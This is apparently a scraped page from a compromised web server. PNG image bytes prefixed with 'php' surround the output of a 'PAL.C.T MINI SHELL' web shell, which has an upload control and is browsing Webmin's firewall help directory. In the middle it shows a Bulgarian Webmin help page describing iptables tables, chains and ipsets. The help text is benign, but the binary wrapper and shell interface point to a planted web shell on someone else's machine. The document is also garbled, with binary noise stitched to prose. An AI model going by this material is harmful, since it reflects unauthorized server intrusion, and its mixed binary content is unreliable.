php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/firewall6/help/
upload
files >> //usr/libexec/webmin/firewall6/help/intro.bg.auto.html

<header> Linux защитна стена </header><h3> Въвеждане на модул </h3> Този модул ви позволява да конфигурирате функциите на защитната стена на IPtables, намиращи се в 2.4 серията Linux ядра. За разлика от някои други програми за конфигуриране на защитната стена, вместо да създава скрипт за черупки, който настройва защитната стена, той чете и редактира файл за запазване във формат, прочетен и написан съответно от <tt>ipi (6) таблици-възстановяване</tt> и <tt>ipi (6) таблици-запазване</tt> . <p> Ако вече имате защитна стена на вашата система, която е била инсталирана ръчно или от скриптов файл, модулът ще предложи да я преобразува в файл за запазване на IPtables за вас и да създаде скрипт, който да се стартира при зареждане, за да активирате правилата в файлът. Ако направите това обаче, не трябва повече да редактирате скрипта си с правила за защитна стена и да го забраните да работи и по време на зареждане. <p><h3> Преглед на IPtables </h3> Всеки мрежов пакет, който влиза, излиза или препраща от вашата система, се проверява за една или повече вериги, за да се определи какво ще се случи с нея. Всяка верига съдържа нула или повече правила, всяко от които има условие (за да определи кои пакети съвпада) и действие (за контрол на това, което се случва с тези съвпадащи пакети). Всяка верига също има действие по подразбиране, което контролира какво се случва с пакетите, които не съответстват на нито едно правило. <p> Всяка верига е част от таблица, от която в момента има три: <ul><li> <b>Филтриране на пакети ( <tt>филтър</tt> )</b> <br> Веригите в тази таблица могат да се използват за контрол на данни, постъпващи във вашата система от други хостове в мрежата, данни, изпращани от вашата система от потребители и процеси, и данни, предавани от вашата система, ако тя действа като рутер. <p><li> <b>Превод на мрежови адреси ( <tt>nat</tt> )</b> <br> Тази таблица може да се използва за настройка на NAT или маскиране, което е полезно, ако искате да дадете на цяла мрежа от машини достъп до интернет чрез само един реален IP адрес. <p><li> <b>Промяна на пакети ( <tt>mangle</tt> )</b> <br> Тази таблица е за промяна на пакети, препратени или изпратени от вашата система. <p></ul> В допълнение към стандартните вериги, които са част от всяка таблица, можете също да създадете свои собствени вериги, които могат да бъдат управлявани по правила във веригите за вграждане. Това може да бъде полезно за групиране и споделяне на правила, които могат да се използват на много места. <p><h3> Главната страница </h3> Главната страница на този модул изброява всички вериги и правила от една от наличните таблици, избрани от списъка в горния ляв ъгъл. По-долу е даден раздел за всяка верига в текущата таблица, като всички правила във всяка верига са изброени и техните условия са описани най-добре от възможностите на модула. За всяка верига можете да промените действието по подразбиране, като използвате падащия списък, ако веригата е една от вградените в таблицата, или да я изтриете с бутона Изтриване на веригата, ако е дефиниран от потребителя. <p> Можете да кликнете върху всяко правило във верига, за да го редактирате, щракнете върху стрелките вдясно на всеки ред, за да го преместите нагоре или надолу, или щракнете върху бутона Добавяне на правило, за да добавите ново. Добавянето или редактирането на правило ще ви отведе до страница, на която можете да изберете действието за всяко правило и условията, за които се изпълнява действието. <p> В долната част на страницата е бутон за активиране на текущата конфигурация на защитната стена, като я заредите в ядрото с <tt>командата ipi (6) таблици-възстановяване</tt> . Под него има бутон за извършване на обратната страна - вземане на конфигурацията, която е в момента в ядрото, и предоставяне на нея за редактиране. И накрая, ако вашата дистрибуция го поддържа, има бутон, за да промените дали защитната стена е активирана по време на зареждане или не. <p><h3> Филтриращи вериги </h3> За по-добро сътрудничество с външни iptables скриптове можете да изключите отделни вериги от обработката чрез защитната стена. За да направите това, трябва да изберете директна обработка на правила в настройките и да въведете списък с филтри, което изключва съответните вериги от обработката. Веригите, които не са изключени от редактирането, са маркирани със съобщение „не се управлява от защитна стена“. <p><h3> IP комплекти </h3> По-новите версии на ip (6) таблицата поддържат разширението ipset. IP наборите са списъци с IP адреси в основната памет, които могат да се търсят много ефективно и да се използват като условие в правилата. На главната страница се показват съществуващите IP набори, които могат да се използват от правила. В момента обаче не е възможно да се управляват тези в защитната стена. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`